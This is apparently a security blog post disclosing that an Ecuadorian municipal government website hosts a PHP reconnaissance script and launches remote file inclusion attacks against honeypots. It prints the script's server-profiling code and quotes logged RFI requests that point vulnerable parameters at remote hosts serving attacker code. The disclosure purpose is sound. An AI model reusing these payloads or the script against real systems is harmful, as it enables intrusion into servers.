Ecuador Government site hacked and spreading malware

Colombia, Venezuela and now Ecuador. How far are we from reporting the whole South America? 🙂

The web site from the ‘Municipio del Cantón Mejía’ in Ecuador has been hosting malware and also attacking our honeypots for a while. As always, we reported and didn’t hear anything back.

They are hosting the common FX29ID php exploit:

http://www.municipiodemejia.gov.ec/administrator/components/com_search/sken/id1(feelcomz).txt

< ? php
##[ Fxxxx ]##
fx(“ID”,”FeeL”.”CoMz”);
$P = @getcwd();
$IP = @getenv(“SERVER_ADDR”);
$UID = fx29exec(“id”);
fx(“SAFE”,@safemode()?”ON”:”OFF”);
fx(“OS”,@PHP_OS);
fx(“UNAME”,@php_uname());
fx(“SERVER”,($IP)?$IP:”-“);
fx(“USER”,@get_current_user());
fx(“UID”,($UID)?$UID:”uid=”.@getmyuid().” gid=”.@getmygid());
fx(“DIR”,$P);
fx(“PERM”,(@is_writable($P))?”[W]”:”[R]”);
fx(“HDD”,”Used: “.hdd(“used”).” Free: “.hdd(“free”).” Total: “.hdd(“total”));
fx(“DISFUNC”,@getdisfunc());
##[ FX29SHEXEC ]##

Also attempting RFI attacks against our systems (190.152.217.250 is their IP address):

SCAN:190.152.217.250 /xxx/new-visitor.inc.php?lvc_include_dir=http://www.j8design.com/id1.txt?
190.152.217.250 /xxx/show.php?path= http://kucing1.fileave.com/id1.txt?
190.152.217.250 //?_SERVER[DOCUMENT_ROOT]= http://clompunk.webs.com/id1.txt?
190.152.217.250 //bbs///skin/buzzard_espoon/setup.php?dir= http://www.hyonsvc.co.kr//bbs//icon/id1.txt????????
190.152.217.250 //delete_comment.php?board_skin_path= http://www.hyonsvc.co.kr//bbs//icon/id1.txt

If you know anyone at the Ecuador .gov, let them know about it. Hopefully they will get it fixed soon.